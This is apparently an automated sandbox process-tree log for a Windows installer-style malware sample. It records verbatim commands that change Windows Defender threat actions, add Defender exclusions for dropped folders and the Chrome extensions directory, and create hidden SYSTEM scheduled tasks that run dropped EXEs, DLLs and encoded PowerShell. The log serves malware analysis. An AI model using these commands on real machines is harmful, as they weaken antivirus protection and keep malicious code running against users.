C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "blQxnfAaNNFZMWpemd" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exe\" XC /jHfdidTVK 385132 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 8204⤵
- Program crash
PID:4656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exe XC /jHfdidTVK 385132 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4760
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:768
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WIQLPldOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WIQLPldOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fjxFshYjVWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fjxFshYjVWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ixMyiQryENPMC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ixMyiQryENPMC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMeQRvtmXyxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMeQRvtmXyxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JHBMAPUCCwSCzfVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JHBMAPUCCwSCzfVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\hwSlakOgexbeQMmf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\hwSlakOgexbeQMmf\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:323⤵PID:2164
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:324⤵PID:1872
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:643⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:323⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:643⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:323⤵PID:3444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:643⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:323⤵PID:3772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:643⤵PID:32
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:323⤵PID:3848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:643⤵PID:3764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JHBMAPUCCwSCzfVB /t REG_DWORD /d 0 /reg:323⤵PID:3856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JHBMAPUCCwSCzfVB /t REG_DWORD /d 0 /reg:643⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo /t REG_DWORD /d 0 /reg:323⤵PID:3432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo /t REG_DWORD /d 0 /reg:643⤵PID:4016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\hwSlakOgexbeQMmf /t REG_DWORD /d 0 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\hwSlakOgexbeQMmf /t REG_DWORD /d 0 /reg:643⤵PID:5080
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqUIbQjsM" /SC once /ST 05:24:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:4616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqUIbQjsM"2⤵PID:2928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqUIbQjsM"2⤵PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AxfyqSaZTcFttLJtv" /SC once /ST 09:22:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\mdAXtPS.exe\" T3 /VEUWdideL 385132 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AxfyqSaZTcFttLJtv"2⤵PID:3244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 6002⤵
- Program crash
PID:2296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3148
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5084
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2824
-
C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\mdAXtPS.exeC:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\mdAXtPS.exe T3 /VEUWdideL 385132 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "blQxnfAaNNFZMWpemd"2⤵PID:768
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4060
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4644
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2312
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\WIQLPldOU\HKgHFn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zuAKRFeuERsPXGg" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zuAKRFeuERsPXGg2" /F /xml "C:\Program Files (x86)\WIQLPldOU\dRuFPYX.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zuAKRFeuERsPXGg"2⤵PID:2844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zuAKRFeuERsPXGg"2⤵PID:4524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lJTDNNrzcsGlGa" /F /xml "C:\Program Files (x86)\qMeQRvtmXyxU2\jJQVFBu.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VRuKNmtcmCQGr2" /F /xml "C:\ProgramData\JHBMAPUCCwSCzfVB\jQoOWCz.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:32
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UZNAYPGMDJwYFtgCO2" /F /xml "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\GylyHog.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dnucZiIKRABpvEFHHbL2" /F /xml "C:\Program Files (x86)\ixMyiQryENPMC\CuTPMYm.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cTixPRTTdvXlYhynT" /SC once /ST 04:28:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\hwSlakOgexbeQMmf\pxtLGgMG\iazIYGF.dll\",#1 /FNVdidcsEW 385132" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cTixPRTTdvXlYhynT"2⤵PID:516
-
-
